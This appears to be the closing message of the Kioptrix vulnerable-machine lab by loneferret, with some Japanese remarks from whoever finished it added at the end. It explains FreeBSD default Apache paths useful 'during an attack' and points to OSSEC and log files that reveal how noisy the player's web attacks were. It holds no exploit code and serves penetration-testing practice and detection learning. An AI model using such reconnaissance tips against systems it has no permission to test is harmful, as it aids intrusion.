For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won't from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log".
It's default document root is not "/var/www/" but in "/usr/local/www/apache22/data".
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things.
Default settings, nothing fancy but it should've logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS 
for this.
The httpd-access.log is rather self-explanatory .
Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain
files. This one should've detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.

Be good...


loneferret
http://www.kioptrix.com


p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by
default it would've blocked your IP (both in hosts.allow & Firewall) for
600 seconds. I was nice enough to remove that part :)

やったぜ。

終わり

exploitコードが改行無いのはデフォ？